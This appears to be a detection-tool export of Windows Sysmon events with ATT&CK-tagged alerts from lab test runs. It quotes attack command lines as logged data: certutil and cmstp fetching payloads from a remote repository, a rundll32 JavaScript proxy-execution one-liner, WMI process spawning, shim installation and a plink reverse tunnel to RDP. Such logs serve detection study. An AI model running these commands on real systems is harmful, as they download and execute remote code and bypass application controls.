747F3D96-666B-5D3F-0000-0010EF858E00 264 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-666B-5D3F-0000-001033648E00 1580 C:\Windows\System32\cmd.exe cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," 1 5 4 1 0 0x8000000000000000 4994 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.763 747F3D96-666B-5D3F-0000-0010EF858E00 264 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-666B-5D3F-0000-001033648E00 1580 C:\Windows\System32\cmd.exe cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4993 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.663 747F3D96-666B-5D3F-0000-00102F7F8E00 3224 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-666B-5D3F-0000-001051638E00 5840 C:\Windows\System32\cmd.exe cmd /c winrm qc -q ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," 1 5 4 1 0 0x8000000000000000 4991 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.285 747F3D96-666B-5D3F-0000-001033648E00 1580 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," 1 5 4 1 0 0x8000000000000000 4991 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.285 747F3D96-666B-5D3F-0000-001033648E00 1580 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1," 1 5 4 1 0 0x8000000000000000 4990 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.246 747F3D96-666B-5D3F-0000-001051638E00 5840 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c winrm qc -q C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1," 1 5 4 1 0 0x8000000000000000 1966503 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 21:00:01.529 365ABB72-5851-5C91-0000-00107D050A00 2716 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-528D-5C91-0000-0020E7030000 0x3e7 0 System MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-5851-5C91-0000-0010E1030A00 2772 C:\Windows\System32\wsqmcons.exe C:\Windows\System32\wsqmcons.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," 1 5 4 1 0 0x8000000000000000 4988 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:30.462 747F3D96-6666-5D3F-0000-0010AE068E00 1464 C:\Windows\System32\forfiles.exe 10.0.17763.1 (WinBuild.160101.0800) ForFiles - Executes a command on selected files Microsoft® Windows® Operating System Microsoft Corporation forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 747F3D96-6666-5D3F-0000-001016F78D00 2244 C:\Windows\System32\cmd.exe cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 1966501 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:58:44.187 365ABB72-5804-5C91-0000-001044DE0900 2456 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-528D-5C91-0000-0020E7030000 0x3e7 2 System MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-57FB-5C91-0000-00104FD40900 2128 C:\osk.exe "c:\osk.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," 1 5 4 1 0 0x8000000000000000 4986 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:30.221 747F3D96-6666-5D3F-0000-001016F78D00 2244 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1," 1 5 4 1 0 0x8000000000000000 4983 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:25.180 747F3D96-6661-5D3F-0000-00107AB88D00 6428 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4982 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:34:20.735 747F3D96-665C-5D3F-0000-0010E37B8D00 4520 C:\Windows\System32\certutil.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49833 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4981 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:34:20.619 747F3D96-665C-5D3F-0000-0010E37B8D00 4520 C:\Windows\System32\certutil.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49832 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1," 1 5 4 1 0 0x8000000000000000 4980 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:20.410 747F3D96-665C-5D3F-0000-0010E37B8D00 4520 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-665C-5D3F-0000-0010096B8D00 7088 C:\Windows\System32\cmd.exe cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4980 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:20.410 747F3D96-665C-5D3F-0000-0010E37B8D00 4520 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-665C-5D3F-0000-0010096B8D00 7088 C:\Windows\System32\cmd.exe cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4978 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:20.134 747F3D96-665C-5D3F-0000-0010096B8D00 7088 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1," 1 5 4 1 0 0x8000000000000000 4977 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:15.502 747F3D96-6657-5D3F-0000-001011298D00 1004 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6657-5D3F-0000-001029198D00 1808 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," 1 5 4 1 0 0x8000000000000000 4977 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:15.502 747F3D96-6657-5D3F-0000-001011298D00 1004 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6657-5D3F-0000-001029198D00 1808 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," 1 5 4 1 0 0x8000000000000000 4977 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:15.502 747F3D96-6657-5D3F-0000-001011298D00 1004 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6657-5D3F-0000-001029198D00 1808 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966480 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:58:20.894 365ABB72-57EC-5C91-0000-001097810900 2848 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb" C:\Users\user01\Desktop\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," 1 5 4 1 0 0x8000000000000000 4975 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:15.202 747F3D96-6657-5D3F-0000-001029198D00 1808 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966464 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:52:47.364 365ABB72-569F-5C91-0000-0010D96C0800 3140 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1," 1 5 4 1 0 0x8000000000000000 1940899 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-02-16 10:02:21.934 365ABB72-DFAD-5C67-0000-0010E0811500 2312 